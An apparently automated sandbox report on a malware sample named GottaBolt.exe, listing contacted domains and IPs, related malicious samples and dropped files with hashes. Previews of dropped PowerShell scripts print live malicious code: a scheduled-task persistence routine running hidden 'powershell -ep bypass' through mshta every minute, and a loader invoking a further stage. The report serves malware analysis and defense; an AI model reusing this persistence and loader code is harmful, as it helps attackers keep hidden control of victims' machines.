http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	GottaBolt.exe	false		high
https://dfssinstitute.com/?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f5	GottaBolt.exe, 00000000.00000002.2629516834.0000025280350000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803CD000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.000002528041E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803F6000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	GottaBolt.exe	false		high
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0	GottaBolt.exe	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2368919507.0000024E96770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ssl.com/repository0	GottaBolt.exe	false		high
http://dfssinstitute.com	GottaBolt.exe, 00000000.00000002.2629516834.0000025280307000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000004.00000002.2346622209.0000024E86701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F8668D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86677000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2346622209.0000024E86701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86677000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0	GottaBolt.exe	false		high
https://dfssinstitute.com	GottaBolt.exe, 00000000.00000002.2629516834.00000252802FE000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280350000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803CD000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.000002528041E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803F6000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252802F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0P	GottaBolt.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
77.91.73.101	dfssinstitute.com	Russian Federation		42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	true
172.86.76.228	unknown	United States		9009	M247GB	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561030
Start date and time:	2024-11-22 17:10:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	GottaBolt.exe
Detection:	MAL
Classification:	mal72.evad.winEXE@16/17@1/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 91% Number of executed functions: 29 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiApSrv.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5064 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: GottaBolt.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	T0jSGXdxX5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.149.146.15
	PC4rbXSgl4.exe	Get hash	malicious	Unknown	Browse	77.91.77.187
	file.exe	Get hash	malicious	Phorpiex	Browse	77.91.77.92
	i52xoegJro.exe	Get hash	malicious	Amadey	Browse	77.91.77.82
	Jl5yg1Km2s.exe	Get hash	malicious	Amadey	Browse	77.91.77.82
	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	77.91.101.71
	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	77.91.101.71
M247GB	mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	38.205.138.228
	sostener.vbs	Get hash	malicious	Remcos	Browse	91.202.233.169
	http://ok.clicknowvip.com	Get hash	malicious	Unknown	Browse	38.132.109.126
	owari.mips.elf	Get hash	malicious	Unknown	Browse	38.202.251.241
	ppc.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	hmips.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	file.exe	Get hash	malicious	NetSupport RAT	Browse	45.61.128.74
	file.exe	Get hash	malicious	NetSupport RAT	Browse	45.61.128.74
	yhYrGCKq9s.exe	Get hash	malicious	RedLine	Browse	91.202.233.18

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://insights.zohorecruit.com/ck1/2d6f.390d3f0/70932e40-a754-11ef-acd6-525400d4bb1c/c4b396bcef628ee60a3903dd64a571f46a43eb4a/2?e=AP6yJbny%2BojaTRJMo4YN29y4982EEh70QglqvV8aiCoCwftyNixblJXLnLCBIbU9pdrCb4rbSvPbWtRnPycgQw%3D%3D	Get hash	malicious	Unknown	Browse	77.91.73.101
	Payment CCF20240531_0002.html	Get hash	malicious	Unknown	Browse	77.91.73.101
	bootstraper.exe	Get hash	malicious	Unknown	Browse	77.91.73.101
	bootstraper.exe	Get hash	malicious	Unknown	Browse	77.91.73.101
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	77.91.73.101
	http://cdn.prod.website-files.com/65dccdc21b806b929439370e/66e00f5491860971b9b9ef25_80703488528.pdf	Get hash	malicious	Unknown	Browse	77.91.73.101
	2.ps1	Get hash	malicious	Unknown	Browse	77.91.73.101
	BX9IkWcF80.exe	Get hash	malicious	ScreenConnect Tool	Browse	77.91.73.101
	VKXD1NsFdC.exe	Get hash	malicious	ScreenConnect Tool	Browse	77.91.73.101

Process:	C:\Users\user\Desktop\GottaBolt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1583
Entropy (8bit):	5.362359765918443
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6okHNpOtHTHhAHKKk9Hj:iq+wmj0qCYqGSI6oktpOtzHeqKk9D
MD5:	C9D2B602C30A947D47A7AD769B3C8127
SHA1:	D80EB805D03D1D001A988B565C3535C81596FE93
SHA-256:	B404D07115AAAC07450587F37EE92C761E4DB6C07538C43081C1364460BA7FB5
SHA-512:	F64E9D0C4F368C0894EA51D50C734E9C5418DDC69FD32F74CCDDFBBE1C4BD29E6B0C6C825E4A46FA7527F6A18DBA6AFB22CF094BE3A711AC16028801543301EC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11608
Entropy (8bit):	4.890472898059848
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5:	8A4B02D8A977CB929C05D4BC2942C5A9
SHA1:	F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256:	624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512:	38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr0hxezn.wuz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0xfab2z.0nz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4n0wpwr.cc4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbkom40t.tn4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2tgwyaw.lhh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrnfigzy.bgi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0d15lmn.idb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4ci1jov.yec.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjnzhlvh.0gh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z4sqkaty.q4w.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Adobe\YXuuqBFUVgMBaXsghdUv.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1473 x 1473, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	7432853
Entropy (8bit):	7.986271893099559
Encrypted:	false
SSDEEP:	196608:FPB+f1ue/rl7ZbXC/4e0nlW8uTZ6sGW6RAbF2AeWWCWyBaF:FZ+fl/FZA4e4lat6sj69OZBg
MD5:	A2CBABC89FCAA0116EF6C3A81BBF6B2E
SHA1:	91C56617B338A0489BCD5B2524D60A5C989D917E
SHA-256:	799940F29519523970F6E6761D1AC892FEC5BA95DA764BF980ABF4F471DA0B35
SHA-512:	1C3A71B5C37924926F250E871C2F41896D6212480B83C8BB6E5149A7638D3CB80918C84A292AFA84565588F7E2F8754F6623227C47F8E052971347BB36E11314
Malicious:	false
Preview:	.PNG........IHDR.............U-Wy....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w8....UJB.J..%D.hh.....ESR........H...%...>Z".E.H..............z...8."..Z..T.......S.o....1....D.......P.....T.....,....~.8-..R...g.3.......8m.E..2.=..!+..'.@q.]F....o.....}.Eb.......<U.I.b.!...G.c.=........{9...!....i+.So.......4Y..g5..[3..4...P.....d.q(.g..W.@.T..w....b>..."M..2..o.B.-w?..G.<S..a>x./.\|.dm_.].....n..M.p...dz...>..[.X.......\|w.v.{y.h...v.,9...%\.z.E9{..\...9..~._...5..T.{..6.4I..K.cr.(..T.s.E..,...b.z...X......w.i....,..\|..v....3.>.4z3.A...c.#.._....9..Ws.R"Ck..~....Z..8....M....bR\..V._.......Mi..^....t..Z\(..o..t..&#...^)...eL.3....:c.6{%.w...w\...Ys....a:...Z..>.....\.....l...k.....H.g.~..'.`.v."Z..j.O\s......\|v.Ju}9.......4a...h7...On.n.........X75...........^..EGa.-.]K+PLs!...Q.c..B./I.~..W.p.+.S4o....S1i.I.....=......v\|.^!.v8.....5e..X......K.4.=.......db..6W..j.......@.....q ..?.{b%m5...e.g.]..fJ.l..:.0.D..{UtT.........K.$.

C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1

Download File

Process:	C:\Users\user\Desktop\GottaBolt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	793
Entropy (8bit):	5.589103497959563
Encrypted:	false
SSDEEP:	12:UgANn9Ao9m9sg9m9JMGjjgAtvz9GN9J1/460vJ6k/TGNvQXxiG6Kuf3M8AV/j74W:un9N9mN9mRaN9FWJHKNv6ixffOuXM8HS
MD5:	1E8B7467F841214CEDED274F62A443C8
SHA1:	B912FEEA307FD22D8BA4A40A1164C97BEE46D613
SHA-256:	FA9D8D0D8E0C948DC54266799EA39A7CD439E04560D9603B73B63F0247F35218
SHA-512:	7EEA6F3FBF211B2003E323545AB5A343C6EEA9920151E070221BD089D4DE9889062654AB94835650E41DC42E7DF940D2935589116899B148B5FFB19B160727BA
Malicious:	true
Preview:	..$BQUvXUITGJDHWoPYyQBv = $MyInvocation.MyCommand.Name -replace ".ps1",""..$flbEvOoAQIIdwOkkZEkW = $PSCommandPath -replace "1.ps1","2.ps1" ..$flbEvOoAQIIdwOkkZEkW2 = $PSCommandPath -replace "1.ps1","1.txt"....try{.. $HIzWVshXpURAXEhWXAnM = Get-ScheduledTask \| Where-Object {$_.TaskName -like $BQUvXUITGJDHWoPYyQBv }.. $goUUNIQyDIJciswPNyYw = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1).. $XKJSyhkrRAEDWeSYCeRr = New-ScheduledTaskAction -Execute "mshta" -Argument "vbscript:Execute(""CreateObject(""""WScript.Shell"""").Run """"powershell -ep bypass -File """"""""$flbEvOoAQIIdwOkkZEkW """""""""""" ,0:close"")".... Register-ScheduledTask -TaskName $BQUvXUITGJDHWoPYyQBv -Trigger $goUUNIQyDIJciswPNyYw -Action $XKJSyhkrRAEDWeSYCeRr..}catch{}..

C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1

Download File

Process:	C:\Users\user\Desktop\GottaBolt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	634
Entropy (8bit):	5.726161012326609
Encrypted:	false
SSDEEP:	12:Xsn97u8TLNTdLU6c/oLdHT0f+0Uc3Zq/n9Q4mXyB1CctTq9jXoYTc:8n9C8fNTJ3kWdWt3s/n9ZmXyB1lU9zFI
MD5:	96031B520EDF57CE05932931DA90FBDE
SHA1:	47F561244B8D98248BA5123CC37290BE790D1BE1
SHA-256:	749807B925AA8DBFFD4CFA518AA728233CDAAB61B02786207DBBA71949FCB739
SHA-512:	EE818345F62DF6F8CE320350DD62B34FB76D194931BD79D4A0F7A4D0EAFC7C336E8B0F3C3D9C68F63C2161CF52C19576EC9C39AC18222C0ACB71860A5740FD1C
Malicious:	true
Preview:	$twkjxBmygMkxawSaDigb = $MyInvocation.MyCommand.Name -replace ".ps1",""..$svhGAkxsbFdGultyPIvR = $false..$WOYsbyeSpDNVEUMUAuEh = New-Object Threading.EventWaitHandle $true, ([Threading.EventResetMode]::ManualReset), "Global\$twkjxBmygMkxawSaDigb", ([ref] $svhGAkxsbFdGultyPIvR)..if( -not $svhGAkxsbFdGultyPIvR ) {.. Exit..} else{..$YAgJNwmNoCtaMcTZktpt = $PSScriptRoot..$ELGqCfesmGFzJfgIouxx = $MyInvocation.MyCommand.Name -replace "2.ps1","3.ps1"..$FPRFaRlIijCdskOJgxsD = $YAgJNwmNoCtaMcTZktpt + "\"+$ELGqCfesmGFzJfgIouxx..$ilbkOBvdmRcUkcHHEprb = & $FPRFaRlIijCdskOJgxsD..$ilbkOBvdmRcUkcHHEprb.EntryPoint.Invoke($null, $null)..}

C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv3.ps1

Download File

Process:	C:\Users\user\Desktop\GottaBolt.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	4280
Entropy (8bit):	5.847791443543489
Encrypted:	false
SSDEEP:	96:DQT+QxYEQ6QQQz+QsaZMWBYqFh7Mb5QmMtal:8iaYEBprbaZMRqFNMbKmMtal
MD5:	88BFE5800FB382410458E02B60ECD216
SHA1:	D39DD085A2A49EAD217F1013270B5E03646D3DE2
SHA-256:	1E88DD46C36E20AEB6733DD031EAE8D522A8D23C509C438799A4AD697F8C17CE
SHA-512:	3F3073ABED49EAC8CA13C6D3CFA6B1FF7D33D214F01DCE65E76D79DD9BE63B3A2A387D5953D480282E1F11CAA94679F4962D4FBC513B1137AC08A1C01CF074EF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv3.ps1, Author: Joe Security
